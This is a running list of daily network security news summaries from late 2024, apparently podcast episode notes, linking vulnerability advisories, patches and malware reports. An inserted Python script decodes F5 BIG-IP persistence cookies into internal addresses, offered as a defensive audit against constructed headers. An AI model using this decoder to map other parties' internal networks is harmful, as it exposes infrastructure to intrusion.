Fake attachment: Roundcube mail server attacks exploit CVE-2024-37383 vulnerability
https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/fake-attachment-roundcube-mail-server-attacks-exploit-cve-2024-37383-vulnerability
Atlassian Security Bulletin - October 15 2024
https://confluence.atlassian.com/security/security-bulletin-october-15-2024-1442910972.html
OneDev Arbitrary file reading for unauthenticated user
https://github.com/theonedev/onedev/security/advisories/GHSA-7wg5-6864-v489

keywords: onedev; atlassian; roundcube; unifi; vmware; vcenter; http; https; tls

Oct 22, 2024 (5 min)

Network Security News Summary for Tuesday October 22nd, 2024

Emergency Preparedness; HM Surf Exploited; Fortinet and ScienceLogic Vague Patches

A Network Nerd's Take on Emergency Preparedness
https://isc.sans.edu/diary/A%20Network%20Nerd%27s%20Take%20on%20Emergency%20Preparedness/31356
HM Surf Vulnerability: Access to Camera Exploited, CVE-2024-44133
https://www.microsoft.com/en-us/security/blog/2024/10/17/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access/
Fortinet releases patches for undisclosed critical FortiManager vulnerability
https://www.helpnetsecurity.com/2024/10/21/fortimanager-critical-vulnerability/
ScienceLogic Vulnerability
https://rackspace.service-now.com/system_status?id=detailed_status&service=4dafca5a87f41610568b206f8bbb35a6
https://docs.sciencelogic.com/latest/Content/Web_Admin_and_Accounts/System_Administration/sys_admin_system_upgrade.htm

keywords: sciencelogic; rackspace; fortinet; fortimanager; hm surf; apple

Oct 21, 2024 (6 min)

Network Security News Summary for Monday October 21st, 2024

Lost MSFT 365 Logs; Broken Cloud Storage; ESET-Branded Malware; Synology, Spring and Grafana Updates

Microsoft 365: Partially incomplete log data due to monitoring agent issue
https://m365admin.handsontek.net/multiple-services-partially-incomplete-log-data-due-to-monitoring-agent-issue/
End-to-End Encrypted Cloud Storage in the Wild: A Broken Ecosystem
https://brokencloudstorage.info/paper.pdf
ESET-Branded Malware
https://x.com/ESETresearch/status/1847192384448172387
Synology Update
https://www.synology.com/en-us/security/advisory/Synology_SA_24_17
Spring Framework Update CVE-2024-38819 CVE-2024-38820
https://spring.io/blog/2024/10/17/spring-framework-cve-2024-38819-and-cve-2024-38820-published
Grafana Security Release CVE-2024-9264
https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/

keywords: grafana; spring; synology; eset

Oct 20, 2024 (5 min)

Network Security News Summary for Friday October 18th, 2024

AWS Scans; Gatekeeper Bypass; Oracle CPU; Cisco ATA 190 Patch; SAP Code Injection; Dept. of Commerce Advertises Drugs

Scanning Activity from Subnet 15.184.0.0/16
https://isc.sans.edu/diary/Scanning%20Activity%20from%20Subnet%2015.184.0.0%2016/31362
Gatekeeper Bypass
https://unit42.paloaltonetworks.com/gatekeeper-bypass-macos/
Oracle Critical Patch Update
https://www.oracle.com/security-alerts/cpuoct2024.html
Cisco ATA 190 Series Analog Telephone Adapter Firmware Vulnerabilities
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ata19x-multi-RDTEqRsy
SAP Vulnerability
https://redrays.io/blog/poc-sap-note-3433192-code-injection-vulnerability-in-sap-netweaver-as-java/
Dept. of Commerce Sites Advertising Medication
https://x.com/tliston/status/1833542884047654984

keywords: doc; commerce; cisco; ata; oracle

Oct 17, 2024 (5 min)

Network Security News Summary for Thursday October 17th, 2024

Not So Common Passwords; Security Bad Practices; Kubernetes Image Builder Vuln; SolarWinds Help Desk Exploited; noexec Bypass

The Top 10 Not So Common SSH Usernames and Passwords
https://isc.sans.edu/diary/The%20Top%2010%20Not%20So%20Common%20SSH%20Usernames%20and%20Passwords/31360
CISA Product Security Bad Practices
https://www.cisa.gov/resources-tools/resources/product-security-bad-practices
Kubernetes Image Builder Vulnerability CVE-2024-9486 CVE-2024-9594
https://discuss.kubernetes.io/t/security-advisory-cve-2024-9486-and-cve-2024-9594-vm-images-built-with-kubernetes-image-builder-use-default-credentials/30119
SolarWinds Hardcoded Password Exploited CVE-2024-28987
https://www.bleepingcomputer.com/news/security/solarwinds-web-help-desk-flaw-is-now-exploited-in-attacks/
Bypassing noexec and executing arbitrary binaries
https://iq.thc.org/bypassing-noexec-and-executing-arbitrary-binaries
Workshop Website
https://www.sansapi.com/
https://www.sansapi.com/docs

keywords: api; workshop; noexec; solarwinds; kubernetes; cisa

Oct 17, 2024 (5 min)

Network Security News Summary for Wednesday October 16th, 2024

Demo Script Exploits; Quantum Annealing Crypto Attack Paper; EDRSilencer; Synchronizing Passkeys

Angular-base64-upload Demo Script Exploited (CVE-2024-42640)
https://isc.sans.edu/diary/Angular-base64-upload%20Demo%20Script%20Exploited%20%28CVE-2024-42640%29/31354
Quantum Annealing Public Key Cryptographic Attack Algorithm Based on D-Wave Advantage
http://cjc.ict.ac.cn/online/onlinepaper/wc-202458160402.pdf
EDRSilencer
https://github.com/netero1010/EDRSilencer
Synchronizing Passkeys
https://fidoalliance.org/specifications-credential-exchange-specifications/

keywords: passkeys; edrsilencer; quantum annealing; quantum computing; crypto; quantum; angular; base64; upload

Oct 16, 2024 (6 min)

Network Security News Summary for Tuesday October 15th, 2024

Blob URL Phishing; FortiGate Vuln Deep Dive; CLI Entrypoint Takeover

Phishing Page Delivered Through a Blob URL
https://isc.sans.edu/diary/Phishing%20Page%20Delivered%20Through%20a%20%20Blob%20URL/31350
Fortinet FortiGate CVE-2024-23113 deep dive
https://labs.watchtowr.com/fortinet-fortigate-cve-2024-23113-a-super-complex-vulnerability-in-a-super-secure-appliance-in-2024/
This New Supply Chain Attack Technique Can Trojanize All Your CLI Commands
https://checkmarx.com/blog/this-new-supply-chain-attack-technique-can-trojanize-all-your-cli-commands/

keywords: python; npm; entrypoint; cli; developers; phishing; blob; fortinet

Oct 14, 2024 (5 min)

Network Security News Summary for Monday October 14th, 2024

Windows PPTP/L2TP Deprecation; BIG-IP Cookie Issues; Travel Platforms Targeted

Windows PPTP and L2TP Deprecation
https://techcommunity.microsoft.com/t5/windows-server-news-and-best/pptp-and-l2tp-deprecation-a-new-era-of-secure-connectivity/ba-p/4263956
BIG-IP LTM Systems Unencrypted Cookie Exploitation
https://www.cisa.gov/news-events/alerts/2024/10/10/best-practices-configure-big-ip-ltm-systems-encrypt-http-persistence-cookies
Telekopye Hits New Hunting Ground: Hotel Booking Scams
https://www.welivesecurity.com/en/eset-research/telekopye-hits-new-hunting-ground-hotel-booking-scams/

keywords: pptp; l2tp; big-ip; cookies; travel; phishing

Oct 13, 2024 (5 min)
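The CISA item above is about BIG-IP LTM persistence cookies sent without encryption. In the default form the value reads "<ip>.<port>.0000", where the pool member's IPv4 address is stored as a little-endian 32-bit integer and its port as a little-endian 16-bit integer, both printed in decimal; that is why a cookie set by a public site hands anyone the internal address behind the load balancer. The decoder below is an added example, not code from CISA, F5 or the ISC: the HTTP response it parses is constructed, the pool names pool_web and pool_api are made up, and encrypted cookies, IPv6 and route-domain encodings are deliberately out of scope (they are reported as undecodable).

```python
import ipaddress
import re

# Default unencrypted BIG-IP persistence cookie: "<ip>.<port>.0000" with the
# IPv4 address as a little-endian uint32 and the port as a little-endian uint16.
CLASSIC_RE = re.compile(r"^(\d{1,10})\.(\d{1,5})\.0000$")
SET_COOKIE_RE = re.compile(r"^Set-Cookie:\s*(BIGipServer[^=;\s]*)=([^;\s]+)",
                           re.IGNORECASE | re.MULTILINE)


def decode_bigip_cookie(value):
    """Return (ip, port) for a classic cookie value; raise ValueError otherwise."""
    m = CLASSIC_RE.match(value.strip())
    if not m:
        raise ValueError(f"not a classic BIGipServer value: {value!r}")
    try:
        # Both fields are little-endian, so the byte order has to be reversed.
        ip = ipaddress.IPv4Address(int(m.group(1)).to_bytes(4, "little"))
        port = int.from_bytes(int(m.group(2)).to_bytes(2, "little"), "big")
    except OverflowError as exc:  # a field that does not fit its width
        raise ValueError(f"out-of-range field in {value!r}") from exc
    return str(ip), port


def encode_bigip_cookie(ip, port):
    """Inverse of decode_bigip_cookie, handy for building test vectors."""
    ip_le = int.from_bytes(ipaddress.IPv4Address(ip).packed, "little")
    port_le = int.from_bytes(port.to_bytes(2, "big"), "little")
    return f"{ip_le}.{port_le}.0000"


def audit_set_cookie_headers(raw_headers):
    """Find BIGipServer cookies in raw response headers and decode each one.
    decoded=None means the value is not the classic form, for example an
    encrypted cookie, which is the configuration CISA recommends."""
    findings = []
    for name, value in SET_COOKIE_RE.findall(raw_headers):
        entry = {"cookie": name, "pool": name[len("BIGipServer"):], "value": value, "decoded": None}
        try:
            ip, port = decode_bigip_cookie(value)
        except ValueError:
            findings.append(entry)
            continue
        entry.update(decoded=f"{ip}:{port}", ip=ip, port=port,
                     private=ipaddress.IPv4Address(ip).is_private)
        findings.append(entry)
    return findings


# Constructed response headers: the first cookie encodes 10.1.1.100:8080, the
# second stands in for an encrypted (opaque) value, the third is unrelated.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\n"
    "Set-Cookie: BIGipServerpool_web=1677787402.36895.0000; path=/\n"
    "Set-Cookie: BIGipServerpool_api=!encrypted-example-value; path=/\n"
    "Set-Cookie: session=abc123; HttpOnly\n"
)

if __name__ == "__main__":
    for finding in audit_set_cookie_headers(SAMPLE_RESPONSE):
        print(finding)
    print(encode_bigip_cookie("10.1.1.100", 8080))
```

Running the audit against a site's own responses is a quick way to confir whether the fix CISA describes (cookie encryption on the persistence profile) is actually in place: a decodable private address in the output means it is not. The same decoder is what an attacker runs, which is the whole reason the leak matters.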

Network Security News Summary for Friday October 11th, 2024

GPTHoney; Palo Alto "Exploit"; Firefox 0-Day; GitLab Vuln

GPTHoney: A new class of honeypot [Guest Diary]
https://isc.sans.edu/diary/GPTHoney%3A%20A%20new%20class%20of%20honeypot%20%5BGuest%20Diary%5D/31342
Palo Alto Expedition: From N-Day to Full Compromise
https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/
Firefox 0-Day
https://www.mozilla.org/en-US/security/advisories/mfsa2024-51/
GitLab Vulnerabilities Patched
https://securityonline.info/cve-2024-9164-cvss-9-6-gitlab-users-urged-to-update-now/

keywords: gitlab; firefox; palo alto; expedition; gpthoney

Oct 11, 2024 (5 min)

Network Security News Summary for Thursday October 10th, 2024

Perfctl to Infostealer; Wazuh Malware Distribution; USB Airgap Bridge; FortiGate Vuln Exploited

From Perfctl to InfoStealer
https://isc.sans.edu/diary/From%20Perfctl%20to%20InfoStealer/31334
Wazuh Abused by Miner Campaign
https://securelist.com/miner-campaign-misuses-open-source-siem-agent/114022/
USB Sticks Still Bridge Airgaps
https://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/
FortiGate Vulnerability now being exploited
https://nvd.nist.gov/vuln/detail/CVE-2024-23113

keywords: fortigate; usb; bridge; airgap; wazuh; miner; infostealer; perfctl

Oct 10, 2024 (5 min)

Network Security News Summary for Wednesday October 09th, 2024

Microsoft Patch Tuesday; Adobe Patches; .io ccTLD Discontinuing

Microsoft Patch Tuesday - October 2024
https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20-%20October%202024/31336
Adobe Patches
https://helpx.adobe.com/security/security-bulletin.html
The Disappearance of an Internet Domain
https://every.to/p/the-disappearance-of-an-internet-domain

keywords: .io; domain; adobe; patches; microsoft; october

Oct 9, 2024 (6 min)

Network Security News Summary for Tuesday October 08th, 2024

Sequoia Update Issues; Cisco Vuln; iTunes Priv Esc PoC; ISP Wiretap Spying

macOS Sequoia: System/Network Admins, Hold On!
https://isc.sans.edu/diary/macOS%20Sequoia%3A%20System%20Network%20Admins%2C%20Hold%20On!/31330
Cisco Vulnerabilities
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv34x-privesc-rce-qE33TCms
Apple iTunes PoC
https://github.com/mbog14/CVE-2024-44193
Attackers used ISP's Wiretap System to Spy on Users
https://www.wsj.com/politics/national-security/china-cyberattack-internet-providers-260bd835
https://www.bleepingcomputer.com/news/security/atandt-verizon-reportedly-hacked-to-target-us-govt-wiretapping-platform/

keywords: isp; wiretap; attackers; apple; itunes; cisco; macos; sequoia

Oct 8, 2024 (5 min)

Network Security News Summary for Monday October 07th, 2024

CUPS Vuln Scans; Exposed LDAP Servers; Visual Studio Dump File Exploits; Apple Updates

Survey of CUPS exploit attempts
https://isc.sans.edu/diary/Survey%20of%20CUPS%20exploit%20attempts/31326
Exposed LDAP Servers
https://www.usenix.org/conference/usenixsecurity24/presentation/kaspereit
Exploiting Visual Studio via Dump Files
https://ynwarcs.github.io/exploiting-vs-dump-files
Apple Security Updates
https://support.apple.com/en-us/100100
Free API Security Workshop
https://www.sans.org/webcasts/aviata-solo-flight-challenge-cloud-security-workshop-chapter-7/

keywords: apple; ldap; visual studio; cups

Oct 6, 2024 (5 min)

Network Security News Summary for Friday October 04th, 2024

DShield Kickstart; Abused Cloud Services; Pixel Phones Baseband Security; Optigo Vulnerabilities

Kickstart Your DShield Honeypot [Guest Diary]
https://isc.sans.edu/diary/Kickstart%20Your%20DShield%20Honeypot%20%5BGuest%20Diary%5D/31320
CeranaKeeper Use of Cloud Services
https://www.welivesecurity.com/en/eset-research/separating-bee-panda-ceranakeeper-making-beeline-thailand/
Pixel: Addressing Vulnerabilities in Cellular Modems
https://security.googleblog.com/2024/10/pixel-proactive-security-cellular-modems.html
Optigo Spectra Vulnerabilities
https://claroty.com/team82/disclosure-dashboard/cve-2024-41925
https://claroty.com/team82/disclosure-dashboard/cve-2024-45367

keywords: optigo; spectra; php; pixel; modems; baseband; ceranakeeper; dropbox; kickstart; dshield

Oct 3, 2024 (5 min)

Network Security News Summary for Thursday October 03th, 2024

Security Docker Containers; CUPS DDoS Attack; Draytek Vulnerabilities; Security Related Docker Containers https://isc.sans.edu/diary/Security%20related%20Docker%20containers/31318 CUPS DDoS Attack https://www.akamai.com/blog/security-research/october-cups-ddos-threat Draytek Vulnerabilities https://www.forescout.com/resources/draybreak-draytek-research/ SANS Munich (free Community Night Tuesday October 15th) https://www.sans.org/cyber-security-training-events/munich-october-2024/ keywords: munich; bojan; draytek; cups; ddos; containers

Oct 2, 2024, 6 min

Network Security News Summary for Wednesday October 2nd, 2024

Hurricane Aftermath; Zimbra Vuln and Exploit; MSFT Edge Extension Security; Supermicro BMC flaw; Hurricane Helene Aftermath - Cyber Security Awareness Month https://isc.sans.edu/diary/Hurricane%20Helene%20Aftermath%20-%20Cyber%20Security%20Awareness%20Month/31314 Zimbra - Remote Command Execution (CVE-2024-45519) https://blog.projectdiscovery.io/zimbra-remote-code-execution/ Enhancing the security of Microsoft Edge extensions with the new Publish API https://blogs.windows.com/msedgedev/2024/09/30/enhanced-security-for-extensions-with-new-publish-api/ CVE-2024-36435 Deep-Dive: The Year's Most Critical BMC Security Flaw https://www.binarly.io/blog/cve-2024-36435-deep-dive-the-years-most-critical-bmc-security-flaw keywords: supermicro; bmc; edge; microsoft; extensions; zimbra; helene; cyber security awareness month;

Oct 2, 2024, 5 min

Network Security News Summary for Tuesday October 1st, 2024

Mac-Robber Update; Recall Re-Released; Hybrid Cloud Attacks; Ransomware IDs; WhatsUp Gold Patch; Tool Update: mac-robber.py, le-hex-to-ip.py https://isc.sans.edu/diary/Tool%20update%3A%20mac-robber.py%20and%20le-hex-to-ip.py/31310 Ransomware Attacks Expanding to Hybrid Cloud Environments https://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/ Update on Recall Security and Privacy Architecture https://blogs.windows.com/windowsexperience/2024/09/27/update-on-recall-security-and-privacy-architecture/ Detecting Ransomware in Windows Event Logs https://blogs.jpcert.or.jp/en/2024/09/windows.html Progress WhatsUp Gold Update https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-September-2024?popup=true&overview Singapore Class https://jbu.me/singapore keywords: singapore; ransomware; event logs; windows; whatsup gold; progress; recall; cloud; hybrid; mac-robber; le-hex-to-ip

Sep 30, 2024, 6 min

Network Security News Summary for Monday September 30th, 2024

CUPS Vulnerability Update; PHP Updates; Chinese Firewall and DNS; HPE Aruba Patches; CUPS Vulnerability https://isc.sans.edu/diary/Patch%20for%20Critical%20CUPS%20vulnerability%3A%20Don%27t%20Panic/31302 PHP Updates https://www.php.net/ChangeLog-8.php#8.1.30 DNS and the Great Chinese Firewall https://www.assetnote.io/resources/research/insecurity-through-censorship-vulnerabilities-caused-by-the-great-firewall https://isc.sans.edu/diary/Are+You+Piratebay+thepiratebayorg+Resolving+to+Various+Hosts/19175 HPE Aruba Networking Vulnerabilities https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04712en_us&docLocale=en_US keywords: hpe; aruba; dns; firewall; php; updates; cups; vulnerability

Sep 30, 2024, 7 min

Network Security News Summary for Friday September 27th, 2024

Patch for Critical CUPS vulnerability: Don't Panic; Patch for Critical CUPS vulnerability: Don't Panic https://isc.sans.edu/diary/Patch%20for%20Critical%20CUPS%20vulnerability%3A%20Don%27t%20Panic/31302 keywords: cups; browsed; filter; evilsocket

Sep 26, 2024, 6 min

Network Security News Summary for Thursday September 26th, 2024

Corrupt DNS DDoS; SolarWinds Hard Coded Credentials; WatchGuard Advisory; Infostealers and Encrypted Cookie Data; DNS Reflection Update and Corrupted DNS Requests https://isc.sans.edu/diary/DNS%20Reflection%20Update%20and%20Odd%20Corrupted%20DNS%20Requests/31296 CVE-2024-28987 SolarWinds Web Help Desk Hardcoded Credentials Vulnerability https://www.horizon3.ai/attack-research/cve-2024-28987-solarwinds-web-help-desk-hardcoded-credential-vulnerability-deep-dive/ WatchGuard Unauthenticated and Unencrypted SSO Protocol https://www.redteam-pentesting.de/en/advisories/rt-sa-2024-006/ https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2024-00014 Infostealers Overcome Chrome's App Bound Encryption https://securityonline.info/infostealers-overcome-chromes-app-bound-encryption-threatening-user-data-security/ keywords: chrome; cookies; infostealer; watchguard; solarwinds; helpdesk; dns; reflection; dos; ddos

Sep 25, 2024, 7 min

Network Security News Summary for Wednesday September 25th, 2024

RAISECOM Exploit; Cellopoint Vuln; Cisco Smart Licensing Details; Ivanti Traffic Manager Exploited; Linux Vulnerability Controversy; Exploitation of RAISECOM Gateway Devices CVE-2024-7120 https://isc.sans.edu/diary/Exploitation%20of%20RAISECOM%20Gateway%20Devices%20Vulnerability%20CVE-2024-7120/31292 Cellopoint Vulnerability CVE-2024-9043 https://www.twcert.org.tw/en/cp-139-8103-b0568-2.html Cisco Smart Licensing Vulnerability Details https://starkeblog.com/cve-wednesday/cisco/2024/09/20/cve-wednesday-cve-2024-20439.html Ivanti Virtual Traffic Manager Exploited https://www.cisa.gov/known-exploited-vulnerabilities-catalog GNU Linux Systems Possible Critical Vulnerability https://securityonline.info/severe-unauthenticated-rce-flaw-cvss-9-9-in-gnu-linux-systems-awaiting-full-disclosure/ keywords: linux; gnu; vulnerability; controversy; ivanti; virtual traffic manager; cisco; smart licensing; cellopoint; raisecom

Sep 24, 2024, 5 min

Network Security News Summary for Tuesday September 24th, 2024

Resurrected Phishing Tricks; Kaspersky Installs UltraAV; Microchip ASF tinydhcp Vulnerability; Phishing Links With @ Sign https://isc.sans.edu/diary/Phishing%20links%20with%20%40%20sign%20and%20the%20need%20for%20effective%20security%20awareness%20building/31288 Kaspersky Deletes Itself, Installs UltraAV Antivirus Without Warning https://www.bleepingcomputer.com/news/security/kaspersky-deletes-itself-installs-ultraav-antivirus-without-warning/ Microchip ASF tinydhcp Vulnerability https://kb.cert.org/vuls/id/138043 keywords: microchip; asf; tinydhcp; kaspersky; ultraav; antivirus; phishing

Sep 24, 2024, 5 min

Network Security News Summary for Monday September 23rd, 2024

WSUS Deprecation; Windows Hotpatches; WHOIS and Certificates; Versa Vuln; Apache HugeGraph Exploit; Windows Server Update Services Deprecation https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-server-update-services-wsus-deprecation/ba-p/4250436 Windows Server 2025 Hotpatches https://techcommunity.microsoft.com/t5/windows-server-news-and-best/now-in-preview-hotpatch-for-windows-server-2025/ba-p/4248296 Google Suggests Not Using WHOIS for Certificate Validation https://lists.cabforum.org/pipermail/servercert-wg/2024-September/004821.html Versa Director Vulnerability https://security-portal.versa-networks.com/emailbulletins/66e4a8ebda545d61ec2b1ab9 Apache HugeGraph Vulnerability Exploited https://nvd.nist.gov/vuln/detail/CVE-2024-27348 keywords: apache; hugegraph; versa; director; google; whois; certificate; windows; server; hotpatches; update; wsus

Sep 23, 2024, 5 min

Network Security News Summary for Friday September 20th, 2024

Fake GitHub Notices; More Ivanti CSA Vulns; Deanonymizing Tor; iPhone Unlockers; Fake GitHub Site Targeting Developers https://isc.sans.edu/diary/Fake%20GitHub%20Site%20Targeting%20Developers/31282 Ivanti CSA 4.6 Advisory https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-4-6-Cloud-Services-Appliance-CVE-2024-8963?language=en_US German Police Deanonymizes Tor User https://blog.torproject.org/tor-is-still-safe/ Ever wonder how crooks get the credentials to unlock stolen phones? https://arstechnica.com/security/2024/09/cops-bust-website-crooks-used-to-unlock-1-2-million-stolen-mobile-phones/ keywords: iphone; unlocker; police; tor; ivanti; csa; github; fake; phishing; developers

Sep 20, 2024, 7 min

Network Security News Summary for Thursday September 19th, 2024

Python Infostealer Targeting Exodus; ServiceNow KB Leaks; GitLab Patch; Aruba Patch; Python Infostealer Patching Windows Exodus App https://isc.sans.edu/diary/Python%20Infostealer%20Patching%20Windows%20Exodus%20App/31276 ServiceNow Knowledge Bases Data Exposures https://appomni.com/ao-labs/servicenow-knowledge-bases-data-exposures-uncovered/ GitLab Patch https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released/ Aruba Patch https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04709en_us&docLocale=en_US keywords: aruba; gitlab; servicenow; python; exodus

Sep 19, 2024, 4 min

Network Security News Summary for Wednesday September 18th, 2024

Python Exfiltration; VMware vCenter Patch; macOS Calendar Exploit; 23:59, Time to Exfiltrate! https://isc.sans.edu/diary/23%3A59%2C%20Time%20to%20Exfiltrate!/31272 Critical VMware vCenter Vulnerability https://blogs.vmware.com/cloud-foundation/2024/09/17/vmsa-2024-0019-questions-answers/ Zero-Click Calendar invite - Critical zero-click vulnerability chain in macOS https://mikko-kenttala.medium.com/zero-click-calendar-invite-critical-zero-click-vulnerability-chain-in-macos-a7a434fc887b Google Adds Latest Post Quantum Encryption Standard to Chrome https://security.googleblog.com/2024/09/a-new-path-for-kyber-on-web.html keywords: python; firebase; vmware; vcenter; calendar; macos; google; chrome; quantum

Sep 18, 2024, 5 min